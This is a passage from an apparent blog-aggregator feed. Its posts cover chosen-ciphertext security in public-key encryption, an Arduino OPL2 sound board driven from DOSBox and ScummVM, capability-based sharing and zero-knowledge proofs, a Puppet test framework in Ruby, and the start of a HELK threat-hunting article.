The answer, it turns out, is that there are many real-life examples where the attacker has decryption capability, but the scheme isn’t obviously broken. For example:

1. Sometimes an attacker can decrypt a limited set of ciphertexts (for example, because someone leaves the decryption machine unattended at lunchtime.) The question then is whether they can learn enough from this access to decrypt other ciphertexts that are generated after she loses access to the decryption machine — for example, messages that are encrypted after the operator comes back from lunch.
2. Sometimes an attacker can submit any ciphertext she wants — but will only obtain a partial decryption of the ciphertext. For example, she might learn only a single bit of information such as “did this ciphertext decrypt correctly”. The question, then, is whether she can leverage this tiny amount of data to fully decrypt some ciphertext of her choosing.

The first example is generally called a “non-adaptive” chosen ciphertext attack, or a CCA1 attack (and sometimes, historically, a “lunchtime” attack). There are a few encryption schemes that totally fall apart under this attack — the most famous textbook example is Rabin’s public key encryption scheme, which allows you to recover the full secret key from just a single chosen-ciphertext decryption.

The more powerful second example is generally referred to as an “adaptive” chosen ciphertext attack, or a CCA2 attack. The term refers to the idea that the attacker can select the ciphertexts they try to decrypt based on seeing a specific ciphertext that they want to attack, and by seeing the answers to specific decryption queries.

In this article we’re going to use the more powerful “adaptive” (CCA2) definition, because that subsumes the CCA1 definition. We’re also going to focus primarily on public-key encryption.

With this in mind, here is the intuitive definition of the experiment we want a CCA2 public-key encryption scheme to be able to survive:

1. I generate an encryption keypair for a public-key scheme and give you the public key.
2. You can send me (sequentially and adaptively) many ciphertexts, which I will decrypt with my secret key. I’ll give you the result of each decryption.
3. Eventually you’ll send me a pair of messages (of equal length) $M_0, M_1$ and I’ll pick a bit $b$ at random, and return to you the encryption of $M_b$, which I will denote as $C^* \leftarrow {\sf Encrypt}(pk, M_b)$.
4. You’ll repeat step (2), sending me ciphertexts to decrypt. If you send me $C^*$ I’ll reject your attempt. But I’ll decrypt any other ciphertext you send me, even if it’s only slightly different from $C^*$.
5. The attacker outputs their guess $b'$. They “win” the game if $b'=b$.

We say that our scheme is secure if the attacker wins only with a significantly greater probability than they would win with if they simply guessed $b'$ at random. Since they can win this game with probability 1/2 just by guessing randomly, that means we want (Probability attacker wins the game) – 1/2 to be “very small” (typically a negligible function of the security parameter).

You should notice two things about this definition. First, it gives the attacker the full decryption of any ciphertext they send me. This is obviously much more powerful than just giving the attacker a single bit of information, as we mentioned in the example further above. But note that powerful is good. If our scheme can remain secure in this powerful experiment, then clearly it will be secure in a setting where the attacker gets strictly less information from each decryption query.

The second thing you should notice is that we impose a single extra condition in step (4), namely that the attacker cannot ask us to decrypt $C^*$. We do this only to prevent the game from being “trivial” — if we did not impose this requirement, the attacker could always just hand us back $C^*$ to decrypt, and they would always learn the value of $b$.

(Notice as well that we do not give the attacker the ability to request encryptions of chosen plaintexts. We don’t need to do that in the public key encryption version of this game, because we’re focusing exclusively on public-key encryption here — since the attacker has the public key, she can encrypt anything she wants without my help.)

With definitions out of the way, let’s talk a bit about how we achieve CCA2 security in real schemes.

### A quick detour: symmetric encryption

This post is mainly going to focus on public-key encryption, because that’s actually the problem that’s challenging and interesting to solve. It turns out that achieving CCA2 for symmetric-key encryption is really easy. Let me briefly explain why this is, and why the same ideas don’t work for public-key encryption.

(To explain this, we’ll need to slightly tweak the CCA2 definition above to make it work in the symmetric setting. The changes here are small: we won’t give the attacker a public key in step (1), and at steps (2) and (4) we will allow the attacker to request the encryption of chosen plaintexts as well as the decryption.)

The first observation is that many common encryption schemes — particularly, the widely-used cipher modes of operation like CBC and CTR — are semantically secure in a model where the attacker does not have the ability to decrypt chosen ciphertexts. However, these same schemes break completely in the CCA2 model.

The simple reason for this is ciphertext malleability. Take CTR mode, which is particularly easy to mess with. Let’s say we’ve obtained a ciphertext $C^*$ at step (4) (recall that $C^*$ is the encryption of $M_b$), it’s trivially easy to “maul” the ciphertext — simply by flipping, say, a bit of the message (i.e., XORing it with “1”). This gives us a new ciphertext $C' = C^* \oplus 1$ that we are now allowed to submit for decryption. We are now allowed (by the rules of the game) to submit this ciphertext, and obtain $M_b \oplus 1$, which we can use to figure out $b$.

(A related, but “real world” variant of this attack is Vaudenay’s Padding Oracle Attack, which breaks actual implementations of symmetric-key cryptosystems. Here’s one we did against Apple iMessage. Here’s an older one on XML encryption.)

So how do we fix this problem? The straightforward observation is that we need to prevent the attacker from mauling the ciphertext $C^*$. The generic approach to doing this is to modify the encryption scheme so that it includes a Message Authentication Code (MAC) tag computed over every CTR-mode ciphertext. The key for this MAC scheme is generated by the encrypting party (me) and kept with the encryption key. When asked to decrypt a ciphertext, the decryptor first checks whether the MAC is valid. If it’s not, the decryption routine will output “ERROR”. Assuming an appropriate MAC scheme, the attacker can’t modify the ciphertext (including the MAC) without causing the decryption to fail and produce a useless result.

So in short: in the symmetric encryption setting, the answer to CCA2 security is simply for the encrypting parties to authenticate each ciphertext using a secret authentication (MAC) key they generate. Since we’re talking about symmetric encryption, that extra (secret) authentication key can be generated and stored with the decryption key. (Some more efficient schemes make this all work with a single key, but that’s just an engineering convenience.) Everything works out fine.

So now we get to the big question.

### CCA security is easy in symmetric encryption. Why can’t we just do the same thing for public-key encryption?

As we saw above, it turns out that strong authenticated encryption is sufficient to get CCA(2) security in the world of symmetric encryption. Sadly, when you try this same idea generically in public key encryption, it doesn’t always work. There’s a short reason for this, and a long one. The short version is: it matters who is doing the encryption.

Let’s focus on the critical difference. In the symmetric CCA2 game above, there is exactly one person who is able to (legitimately) encrypt ciphertexts. That person is me. To put it more clearly: the person who performs the legitimate encryption operations (and has the secret key) is also the same person who is performing decryption.

Even if the encryptor and decryptor aren’t literally the same person, the encryptor still has to be honest. (To see why this has to be the case, remember that the encryptor has shared secret key! If that party was a bad guy, then the whole scheme would be broken, since they could just output the secret key to the bad guys.) And once you’ve made the stipulation that the encryptor is honest, then you’re almost all the way there. It suffices simply to add some kind of authentication (a MAC or a signature) to any ciphertext she encrypts. At that point the decryptor only needs to determine whether any given ciphertexts actually came from the (honest) encryptor, and avoid decrypting the bad ones. You’re done.

Public key encryption (PKE) fundamentally breaks all these assumptions.

In a public-key encryption scheme, the main idea is that anyone can encrypt a message to you, once they get a copy of your public key. The encryption algorithm may sometimes be run by good, honest people. But it can also be run by malicious people. It can be run by parties who are adversarial. The decryptor has to be able to deal with all of those cases. One can’t simply assume that the “real” encryptor is honest.

Let me give a concrete example of how this can hurt you. A couple of years ago I wrote a post about flaws in Apple iMessage, which (at the time) used simple authenticated (public key) encryption scheme. The basic iMessage encryption algorithm used public key encryption (actually a combination of RSA with some AES thrown in for efficiency) so that anyone could encrypt a message to my key. For authenticity, it required that every message be signed with an ECDSA signature by the sender.

When I received a message, I would look up the sender’s public key and first make sure the signature was valid. This would prevent bad guys from tampering with the message in flight — e.g., executing nasty stuff like adaptive chosen ciphertext attacks. If you squint a little, this is almost exactly a direct translation of the symmetric crypto approach we discussed above. We’re simply swapping the MAC for a digital signature.

The problems with this scheme start to become apparent when we consider that there might be multiple people sending me ciphertexts. Let’s say the adversary is on the communication path and intercepts a signed message from you to me. They want to change (i.e., maul) the message so that they can execute some kind of clever attack. Well, it turns out this is simple. They simply rip off the honest signature and replace it one they make themselves:

The new message is identical, but now appears to come from a different person (the attacker). Since the attacker has their own signing key, they can maul the encrypted message as much as they want, and sign new versions of that message. If you plug this attack into (a version) of the public-key CCA2 game up top, you see they’ll win quite easily. All they have to do is modify the challenge ciphertext $C^*$ at step (4) to be signed with their own signing key, then they can change it by munging with the CTR mode encryption, and request the decryption of that ciphertext.

Of course if I only accept messages from signed by some original (guaranteed-to-be-honest) sender, this scheme might work out fine. But that’s not the point of public key encryption. In a real public-key scheme — like the one Apple iMessage was trying to build — I should be able to (safely) decrypt messages from anyone, and in that setting this naive scheme breaks down pretty badly.

Whew.

Ok, this post has gotten a bit long, and so far I haven’t actually gotten to the various “tricks” for adding chosen ciphertext security to real public key encryption schemes. That will have to wait until the next post, to come shortly.

### Vincent Bernat

#### OPL2 Audio Board: an AdLib sound card for Arduino

In a previous article, I presented the OPL2LPT, a sound card for the parallel port featuring a Yamaha YM3812 chip, also known as OPL2—the chip of the AdLib sound card. The OPL2 Audio Board for Arduino is another indie sound card using this chip. However, instead of relying on a parallel port, it uses a serial interface, which can be drived from an Arduino board or a Raspberry Pi. While the OPL2LPT targets retrogamers with real hardware, the OPL2 Audio Board cannot be used in the same way. Nonetheless, it can also be operated from ScummVM and DOSBox!

# Unboxing⚓︎

The OPL2 Audio Board can be purchased on Tindie, either as a kit or fully assembled. I have paired it with a cheap clone of the Arduino Nano. A library to drive the board is available on GitHub, along with some examples.

One of them is DemoTune.ino. It plays a short tune on three channels. It can be compiled and uploaded to the Arduino with PlatformIO—installable with pip install platformio—using the following command:1

$platformio ci \ --board nanoatmega328 \ --lib ../../src \ --project-option="targets=upload" \ --project-option="upload_port=/dev/ttyUSB0" \ DemoTune.ino [...] PLATFORM: Atmel AVR > Arduino Nano ATmega328 SYSTEM: ATMEGA328P 16MHz 2KB RAM (30KB Flash) Converting DemoTune.ino [...] Configuring upload protocol... AVAILABLE: arduino CURRENT: upload_protocol = arduino Looking for upload port... Use manually specified: /dev/ttyUSB0 Uploading .pioenvs/nanoatmega328/firmware.hex [...] avrdude: 6618 bytes of flash written [...] ===== [SUCCESS] Took 5.94 seconds =====  Immediately after the upload, the Arduino plays the tune. 🎶 The next interesting example is SerialIface.ino. It turns the audio board into a sound card over serial port. Once the code has been pushed to the Arduino, you can use the play.py program in the same directory to play VGM files. They are a sample-accurate sound format for many sound chips. They log the exact commands sent. There are many of them on VGMRips. Be sure to choose the ones for the YM3812/OPL2! Here is a small selection: # Usage with DOSBox & ScummVM⚓︎ Notice The support for the serial protocol used in this section has not been merged yet. In the meantime, grab SerialIface.ino from the pull request: git checkout 50e1717. When the Arduino is flashed with SerialIface.ino, the board can be driven through a simple protocol over the serial port. By patching DOSBox and ScummVM, we can make them use this unusual sound card. Here are some examples of games: • 0:00, with DOSBox, the first level of Doom 🎮 (1993) • 1:06, with DOSBox, the introduction of Loom 🎼 (1990) • 2:38, with DOSBox, the first level of Lemmings 🐹 (1991) • 3:32, with DOSBox, the introduction of Legend of Kyrandia 🃏 (1992) • 6:47, with ScummVM, the introduction of Day of the Tentacle ☢️ (1993) • 11:10, with DOSBox, the introduction of Another World 🐅 (1991) Another World (also known as Out of This World), designed by Éric Chahi, is using sampled sounds at 5 kHz or 10 kHz. With a serial port operating at 115,200 bits/s, the 5 kHz option is just within our reach. However, I have no idea if the rendering is faithful. Update (2018.05) After some discussions with Walter van Niftrik, we came to the conclusion that, above 1 kHz, DOSBox doesn’t “time-accurately” execute OPL commands. It is using a time slice of one millisecond during which it executes either a fixed number of CPU cycles or as many as possible (with cycles=max). In both cases, emulated CPU instructions are executed as fast as possible and I/O delays are simulated by removing a fixed number of cycles from the allocation of the current time slice. ## DOSBox⚓︎ The serial protocol is described in the SerialIface.ino file: /* * A very simple serial protocol is used. * * - Initial 3-way handshake to overcome reset delay / serial noise issues. * - 5-byte binary commands to write registers. * - (uint8) OPL2 register address * - (uint8) OPL2 register data * - (int16) delay (milliseconds); negative -> pre-delay; positive -> post-delay * - (uint8) delay (microseconds / 4) * * Example session: * * Arduino: HLO! * PC: BUF? * Arduino: 256 (switches to binary mode) * PC: 0xb80a014f02 (write OPL register and delay) * Arduino: k * * A variant of this protocol is available without the delays. In this * case, the BUF? command should be sent as B0F? The binary protocol * is now using 2-byte binary commands: * - (uint8) OPL2 register address * - (uint8) OPL2 register data */  Adding support for this protocol in DOSBox is relatively simple (patch). For best performance, we use the 2-byte variant (5000 ops/s). The binary commands are pipelined and a dedicated thread collects the acknowledgments. A semaphore captures the number of free slots in the receive buffer. As it is not possible to read registers, we rely on DOSBox to emulate the timers, which are mostly used to let the various games detect the OPL2. The patch is tested only on Linux but should work on any POSIX system—not Windows. To test it, you need to build DOSBox from source: $ sudo apt build-dep dosbox
$git clone https://github.com/vincentbernat/dosbox.git -b feature/opl2audioboard$ cd dosbox
$./autogen.sh$ ./configure && make


Replace the sblaster section of ~/.dosbox/dosbox-SVN.conf:

[sblaster]
sbtype=none
oplmode=opl2
oplrate=49716
oplemu=opl2arduino
opl2arduino=/dev/ttyUSB0


Then, run DOSBox with ./src/dosbox. That’s it!

You will likely get the “OPL2Arduino: too slow, consider increasing buffer” message a lot. To fix this, you need to recompile SerialIface.ino with a bigger receive buffer:

$platformio ci \ --board nanoatmega328 \ --lib ../../src \ --project-option="targets=upload" \ --project-option="upload_port=/dev/ttyUSB0" \ --project-option="build_flags=-DSERIAL_RX_BUFFER_SIZE=512" \ SerialIface.ino  ## ScummVM⚓︎ The same code can be adapted for ScummVM (patch). To test, build it from source: $ sudo apt build-dep scummvm
$git clone https://github.com/vincentbernat/scummvm.git -b feature/opl2audioboard$ cd scummvm
$./configure --disable-all-engines --enable-engine=scumm && make  Then, you can start ScummVM with ./scummvm. Select “AdLib Emulator” as the music device and “OPL2 Arduino” as the AdLib emulator.2 Like for DOSBox, watch the console to check if you need a larger receive buffer. Enjoy! 😍 1. This command is valid for an Arduino Nano. For another board, take a look at the output of platformio boards arduino↩︎ 2. If you need to specify a serial port other than /dev/ttyUSB0, add a line opl2arduino_device= in the ~/.scummvmrc configuration file. ↩︎ ## April 20, 2018 ### Sarah Allen #### false dichotomy of control vs sharing Email is the killer app of the Internet. Amidst many sharing and collaboration applications and services, most of us frequently fall back to email. Marc Stiegler suggests that email often “just works better”. Why is this? Digital communication is fast across distances and allows access to incredible volumes of information, yet digital access controls typically force us into a false dichotomy of control vs sharing. Looking at physical models of sharing and access control, we can see that we already have well-established models where we can give up control temporarily, yet not completely. Alan Karp illustrated this nicely at last week’s Internet Identity Workshop (IIW) in a quick anecdote: Marc gave me the key to his car so I could park in in my garage. I couldn’t do it, so I gave the key to my kid, and asked my neighbor to do it for me. She stopped by my house, got the key and used it to park Marc’s car in my garage. The car key scenario is clear. In addition to possession of they key, there’s even another layer of control — if my kid doesn’t have a driver’s license, then he can’t drive the car, even if he holds the key. When we translate this story to our modern digital realm, it sounds crazy: Marc gave me his password so I could copy a file from his computer to mine. I couldn’t do it, so I gave Marc’s password to my kid, and asked my neighbor to do it for me. She stopped by my house so my kid could tell her my password, and then she used it to copy the file from Marc’s computer to mine. After the conference, I read Marc Stiegler’s 2009 paper Rich Sharing for the Web details key features of sharing that we have in the real world that are illustrated in the anecdote that Alan so effectively rattled off. These 6 features (enumerated below) enable people to create networks of access rights that implement the Principle of Least Authority (POLA). The key is to limit how much you need to trust someone before sharing. “Systems that do not implement these 6 features will feel rigid and inadequately functional once enough users are involved, forcing the users to seek alternate means to work around the limitations in those applications.” 1. Dynamic: I can grant access quickly and effortlessly (without involving an administrator). 2. Attenuated: To give you permission to do or see one thing, I don’t have to give you permission to do everything. (e.g. valet key allows driving, but not access to the trunk) 3. Chained: Authority may be delegated (and re-delegated). 4. Composable: I have permission to drive a car from the State of California, and Marc’s car key. I require both permissions together to drive the car. 5. Cross-jurisdiction: There are three families involved, each with its own policies, yet there’s no need to communicate policies to another jurisdiction. In the example, I didn’t need to ask Marc to change his policy to grant my neighbor permission to drive his car. 6. Accountable: If Marc finds a new scratch on his car, he knows to ask me to pay for the repair. It’s up to me to collect from my neighbor. Digital access control systems will typically record who did which action, but don’t record who asked an administrator to grant permission. Note: Accountability is not always directly linked to delegation. Marc would likely hold me accountable if his car got scratched, even if my neighbor had damaged the car when parking it in the garage. Whereas, if it isn’t my garage, bur rather a repair shop where my neighbor drops off the car for Marc, then if the repair shop damages the car, Marc would hold them responsible. ## How does this work for email? The following examples from Marc’s paper were edited for brevity: • Dynamic: You can send email to anyone any time. • Attenuated: When I email you an attachment, I’m sending a read-only copy. You don’t have access to my whole hard drive and you don’t expect that modifying it will change my copy. • Chained: I can forward you an email. You can then forward it to someone else. • Cross-Domain: I can send email to people at other companies and organizations with permissions from their IT dept. • Composable: I can include an attachment from email originating at one company with text or another attachment from another email and send it to whoever I want. • Accountable: If Alice asks Bob to edit a file and email it back, and Bob asks Carol to edit the file, and Bob then emails it back, Alice will hold Bob responsible if the edits are erroneous. If Carol (whom Alice may not know) emails her result directly to Alice, either Alice will ask Carol who she is before accepting the changes, or if Carol includes the history of messages in the message, Alice will directly see, once again, that she should hold Bob responsible. ## Further reading Alan Karp’s IoT Position Paper compares several sharing tools across these 6 features and also discusses ZBAC (authoriZation-Based Access Control) where authorization is known as a “capability.” An object capability is an unforgeable token that both designates a resource and grants permission to access it. ## April 07, 2018 ### Sarah Allen #### zero-knowledge proof: trust without shared secrets In cryptography we typically share a secret which allows us to decrypt future messages. Commonly this is a password that I make up and submit to a Web site, then later produce to verify I am the same person. I missed Kazue Sako’s Zero Knowledge Proofs 101 presentation at IIW last week, but Rachel Myers shared an impressively simply retelling in the car on the way back to San Francisco, which inspired me to read the notes and review the proof for myself. I’ve attempted to reproduce this simple explanation below, also noting additional sources and related articles. Zero Knowledge Proofs (ZPKs) are very useful when applied to internet identity — with an interactive exchange you can prove you know a secret without actually revealing the secret. Understanding Zero Knowledge Proofs with simple math: ### x -> f(x) Simple one way function. Easy to go one way from x to f(x) but mathematically hard to go from f(x) to x. The most common example is a hash function. Wired: What is Password Hashing? provides an accessible introduction to why hash functions are important to cryptographic applications today. ### f(x) = g ^ x mod p Known(public): g, p * g is a constant * p has to be prime Easy to know x and compute g ^ x mod p but difficult to do in reverse. ### Interactive Proof Alice wants to prove Bob that she knows x without giving any information about x. Bob already knows f(x). Alice can make f(x) public and then prove that she knows x through an interactive exchange with anyone on the Internet, in this case, Bob. 1. Alice publishes f(x): g^x mod p 2. Alice picks random number r 3. Alice sends Bob u = g^r mod p 4. Now Bob has artifact based on that random number, but can’t actually calculate the random number 5. Bob returns a challenge e. Either 0 or 1 6. Alice responds with v: If 0, v = r If 1, v = r + x 7. Bob can now calculate: If e == 0: Bob has the random number r, as well as the publicly known variables and can check if u == g^v mod p If e == 1: u*f(x) = g^v (mod p) I believe step 6 is true based on Congruence of Powers, though I’m not sure that I’ve transcribed e==1 case accurately with my limited ascii representation. If r is true random, equally distributed between zero and (p-1), this does not leak any information about x, which is pretty neat, yet not sufficient. In order to ensure that Alice cannot be impersonated, multiple iterations are required along with the use of large numbers (see IIW session notes). ## Further Reading ## April 05, 2018 ### Marios Zindilis #### A small web application with Angular5 and Django Django works well as the back-end of an application that uses Angular5 in the front-end. In my attempt to learn Angular5 well enough to build a small proof-of-concept application, I couldn't find a simple working example of a combination of the two frameworks, so I created one. I called this the Pizza Maker. It's available on GitHub, and its documentation is in the README. If you have any feedback for this, please open an issue on GitHub. ## April 03, 2018 ### R.I.Pienaar #### Adding rich object data types to Puppet Extending Puppet using types, providers, facts and functions are well known and widely done. Something new is how to add entire new data types to the Puppet DSL to create entirely new language behaviours. I’ve done a bunch of this recently with the Choria Playbooks and some other fun experiments, today I’ll walk through building a small network wide spec system using the Puppet DSL. ## Overview A quick look at what we want to achieve here, I want to be able to do Choria RPC requests and assert their outcomes, I want to write tests using the Puppet DSL and they should run on a specially prepared environment. In my case I have a AWS environment with CentOS, Ubuntu, Debian and Archlinux machines: Below I test the File Manager Agent: • Get status for a known file and make sure it finds the file • Create a brand new file, ensure it reports success • Verify that the file exist and is empty using the status action  cspec::suite("filemgr agent tests",$fail_fast, $report) |$suite| {   # Checks an existing file $suite.it("Should get file details") |$t| { $results = choria::task("mcollective", _catch_errors => true, "action" => "filemgr.status", "nodes" =>$nodes, "silent" => true, "fact_filter" => ["kernel=Linux"], "properties" => { "file" => "/etc/hosts" } )   $t.assert_task_success($results)   $results.each |$result| { $t.assert_task_data_equals($result, $result["data"]["present"], 1) } } # Make a new file and check it exists$suite.it("Should support touch") |$t| {$fname = sprintf("/tmp/filemgr.%s", strftime(Timestamp(), "%s"))   $r1 = choria::task("mcollective", _catch_errors => true, "action" => "filemgr.touch", "nodes" =>$nodes, "silent" => true, "fact_filter" => ["kernel=Linux"], "fail_ok" => true, "properties" => { "file" => $fname } )$t.assert_task_success($r1)$r2 = choria::task("mcollective", _catch_errors => true, "action" => "filemgr.status", "nodes" => $nodes, "silent" => true, "fact_filter" => ["kernel=Linux"], "properties" => { "file" =>$fname } )   $t.assert_task_success($r2)   $r2.each |$result| { $t.assert_task_data_equals($result, $result["data"]["present"], 1)$t.assert_task_data_equals($result,$result["data"]["size"], 0) } } } 

I also want to be able to test other things like lets say discovery:

  cspec::suite("${method} discovery method",$fail_fast, $report) |$suite| { $suite.it("Should support a basic discovery") |$t| { $found = choria::discover( "discovery_method" =>$method, )   $t.assert_equal($found.sort, $all_nodes.sort) } }  So we want to make a Spec like system that can drive Puppet Plans (aka Choria Playbooks) and do various assertions on the outcome. We want to run it with mco playbook run and it should write a JSON report to disk with all suites, cases and assertions. ## Adding a new Data Type to Puppet I’ll show how to add the Cspec::Suite data Type to Puppet. This comes in 2 parts: You have to describe the Type that is exposed to Puppet and you have to provide a Ruby implementation of the Type. ### Describing the Objects Here we create the signature for Cspec::Suite:  # modules/cspec/lib/puppet/datatypes/cspec/suite.rb Puppet::DataTypes.create_type("Cspec::Suite") do interface <<-PUPPET attributes => { "description" => String, "fail_fast" => Boolean, "report" => String }, functions => { it => Callable[[String, Callable[Cspec::Case]], Any], } PUPPET load_file "puppet_x/cspec/suite" implementation_class PuppetX::Cspec::Suite end  As you can see from the line of code cspec::suite(“filemgr agent tests”,$fail_fast, $report) |$suite| {….} we pass 3 arguments: a description of the test, if the test should fail immediately on any error or keep going and there to write the report of the suite to. This corresponds to the attributes here. A function that will be shown later takes these and make our instance.

We then have to add our it() function which again takes a description and yields out Cspec::Case, it returns any value.

When Puppet needs the implementation of this code it will call the Ruby class PuppetX::Cspec::Suite.

Here is the same for the Cspec::Case:

 # modules/cspec/lib/puppet/datatypes/cspec/case.rb Puppet::DataTypes.create_type("Cspec::Case") do interface <<-PUPPET attributes => { "description" => String, "suite" => Cspec::Suite }, functions => { assert_equal => Callable[[Any, Any], Boolean], assert_task_success => Callable[[Choria::TaskResults], Boolean], assert_task_data_equals => Callable[[Choria::TaskResult, Any, Any], Boolean] } PUPPET   load_file "puppet_x/cspec/case"   implementation_class PuppetX::Cspec::Case end 

The implementation is a Ruby class that provide the logic we want, I won’t show the entire thing with reporting and everything but you’ll get the basic idea:

 # modules/cspec/lib/puppet_x/cspec/suite.rb module PuppetX class Cspec class Suite # Puppet calls this method when it needs an instance of this type def self.from_asserted_hash(description, fail_fast, report) new(description, fail_fast, report) end   attr_reader :description, :fail_fast   def initialize(description, fail_fast, report) @description = description @fail_fast = !!fail_fast @report = report @testcases = [] end   # what puppet file and line the Puppet DSL is on def puppet_file_line fl = Puppet::Pops::PuppetStack.stacktrace[0]   [fl[0], fl[1]] end   def outcome { "testsuite" => @description, "testcases" => @testcases, "file" => puppet_file_line[0], "line" => puppet_file_line[1], "success" => @testcases.all?{|t| t["success"]} } end   # Writes the memory state to disk, see outcome above def write_report # ... end   def run_suite Puppet.notice(">>>") Puppet.notice(">>> Starting test suite: %s" % [@description]) Puppet.notice(">>>")   begin yield(self) ensure write_report end     Puppet.notice(">>>") Puppet.notice(">>> Completed test suite: %s" % [@description]) Puppet.notice(">>>") end   def it(description, &blk) require_relative "case"   t = PuppetX::Cspec::Case.new(self, description) t.run(&blk) ensure @testcases << t.outcome end end end end 

And here is the Cspec::Case:

 # modules/cspec/lib/puppet_x/cspec/case.rb module PuppetX class Cspec class Case # Puppet calls this to make instances def self.from_asserted_hash(suite, description) new(suite, description) end   def initialize(suite, description) @suite = suite @description = description @assertions = [] @start_location = puppet_file_line end   # assert 2 things are equal and show sender etc in the output def assert_task_data_equals(result, left, right) if left == right success("assert_task_data_equals", "%s success" % result.host) return true end   failure("assert_task_data_equals: %s" % result.host, "%s\n\n\tis not equal to\n\n %s" % [left, right]) end   # checks the outcome of a choria RPC request and make sure its fine def assert_task_success(results) if results.error_set.empty? success("assert_task_success:", "%d OK results" % results.count) return true end   failure("assert_task_success:", "%d failures" % [results.error_set.count]) end   # assert 2 things are equal def assert_equal(left, right) if left == right success("assert_equal", "values matches") return true end   failure("assert_equal", "%s\n\n\tis not equal to\n\n %s" % [left, right]) end   # the puppet .pp file and line Puppet is on def puppet_file_line fl = Puppet::Pops::PuppetStack.stacktrace[0]   [fl[0], fl[1]] end   # show a OK message, store the assertions that ran def success(what, message) @assertions << { "success" => true, "kind" => what, "file" => puppet_file_line[0], "line" => puppet_file_line[1], "message" => message }   Puppet.notice("&#x2714;︎ %s: %s" % [what, message]) end   # show a Error message, store the assertions that ran def failure(what, message) @assertions << { "success" => false, "kind" => what, "file" => puppet_file_line[0], "line" => puppet_file_line[1], "message" => message }   Puppet.err("✘ %s: %s" % [what, @description]) Puppet.err(message)   raise(Puppet::Error, "Test case %s fast failed: %s" % [@description, what]) if @suite.fail_fast end   # this will show up in the report JSON def outcome { "testcase" => @description, "assertions" => @assertions, "success" => @assertions.all? {|a| a["success"]}, "file" => @start_location[0], "line" => @start_location[1] } end   # invokes the test case def run Puppet.notice("==== Test case: %s" % [@description])   # runs the puppet block yield(self)   success("testcase", @description) end end end end 

Finally I am going to need a little function to create the suite – cspec::suite function, it really just creates an instance of PuppetX::Cspec::Suite for us.

 # modules/cspec/lib/puppet/functions/cspec/suite.rb Puppet::Functions.create_function(:"cspec::suite") do dispatch :handler do param "String", :description param "Boolean", :fail_fast param "String", :report   block_param   return_type "Cspec::Suite" end   def handler(description, fail_fast, report, &blk) suite = PuppetX::Cspec::Suite.new(description, fail_fast, report)   suite.run_suite(&blk) suite end end 

## Bringing it together

So that’s about it, it’s very simple really the code above is pretty basic stuff to achieve all of this, I hacked it together in a day basically.

Lets see how we turn these building blocks into a test suite.

I need a entry point that drives the suite – imagine I will have many different plans to run, one per agent and that I want to do some pre and post run tasks etc.

 plan cspec::suite ( Boolean $fail_fast = false, Boolean$pre_post = true, Stdlib::Absolutepath $report, String$data ) { $ds = { "type" => "file", "file" =>$data, "format" => "yaml" }   # initializes the report cspec::clear_report($report) # force a puppet run everywhere so PuppetDB is up to date, disables Puppet, wait for them to finish if$pre_post { choria::run_playbook("cspec::pre_flight", ds => $ds) } # Run our test suite choria::run_playbook("cspec::run_suites", _catch_errors => true, ds =>$ds, fail_fast => $fail_fast, report =>$report ) .choria::on_error |$err| { err("Test suite failed with a critical error:${err.message}") }   # enables Puppet if $pre_post { choria::run_playbook("cspec::post_flight", ds =>$ds) }   # reads the report from disk and creates a basic overview structure cspec::summarize_report($report) }  Here’s the cspec::run_suites Playbook that takes data from a Choria data source and drives the suite dynamically:  plan cspec::run_suites ( Hash$ds, Boolean $fail_fast = false, Stdlib::Absolutepath$report, ) { $suites = choria::data("suites",$ds)   notice(sprintf("Running test suites: %s", $suites.join(", "))) choria::data("suites",$ds).each |$suite| { choria::run_playbook($suite, ds => $ds, fail_fast =>$fail_fast, report => $report ) } }  And finally a YAML file defining the suite, this file describes my AWS environment that I use to do integration tests for Choria and you can see there’s a bunch of other tests here in the suites list and some of them will take data like what nodes to expect etc.  suites: - cspec::discovery - cspec::choria - cspec::agents::shell - cspec::agents::process - cspec::agents::filemgr - cspec::agents::nettest choria.version: mcollective plugin 0.7.0 nettest.fqdn: puppet.choria.example.net nettest.port: 8140 discovery.all_nodes: - archlinux1.choria.example.net - centos7.choria.example.net - debian9.choria.example.net - puppet.choria.example.net - ubuntu16.choria.example.net discovery.mcollective_nodes: - archlinux1.choria.example.net - centos7.choria.example.net - debian9.choria.example.net - puppet.choria.example.net - ubuntu16.choria.example.net discovery.filtered_nodes: - centos7.choria.example.net - puppet.choria.example.net discovery.fact_filter: operatingsystem=CentOS  ## Conclusion So this then is a rather quick walk through of extending Puppet in ways many of us would not have seen before. I spent about a day getting this all working which included figuring out a way to maintain the mutating report state internally etc, the outcome is a test suite I can run and it will thoroughly drive a working 5 node network and assert the outcomes against real machines running real software. I used to have a MCollective integration test suite, but I think this is a LOT nicer mainly due to the Choria Playbooks and extensibility of modern Puppet.  $ mco playbook run cspec::suite --data pwd/suite.yaml --report pwd/report.json 

The current code for this is on GitHub along with some Terraform code to stand up a test environment, it’s a bit barren right now but I’ll add details in the next few weeks.

### HolisticInfoSec.org

#### toolsmith #132 - The HELK vs APTSimulator - Part 2

Continuing where we left off in The HELK vs APTSimulator - Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks  as part of its lab offering. These capabilities scale well beyond a standard ELK stack, this really is where parallel computing and significantly improved processing and analytics truly take hold. This is a great way to introduce yourself to these technologies, all on a unified platform.

Let me break these down for you a little bit in case you haven't been exposed to these technologies yet. First and foremost, refer to @Cyb3rWard0g's wiki page on how he's designed it for his HELK implementation, as seen in Figure 1.
 Figure 1: HELK Architecture
First, Apache Spark. For HELK, "Elasticsearch-hadoop provides native integration between Elasticsearch and Apache Spark, in the form of an RDD (Resilient Distributed Dataset) (or Pair RDD to be precise) that can read data from Elasticsearch." Per the Apache Spark FAQ, "Spark is a fast and general processing engine compatible with Hadoop data" to deliver "lighting-fast cluster computing."
Second, GraphFrames. From the GraphFrames overview, "GraphFrames is a package for Apache Spark which provides DataFrame-based Graphs. GraphFrames represent graphs: vertices (e.g., users) and edges (e.g., relationships between users). GraphFrames also provide powerful tools for running queries and standard graph algorithms. With GraphFrames, you can easily search for patterns within graphs, find important vertices, and more."
Finally, Jupyter Notebooks to pull it all together.
From Jupyter.org: "The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more." Jupyter Notebooks provide a higher order of analyst/analytics capabilities, if you haven't dipped your toe in that water, this may be your first, best opportunity.
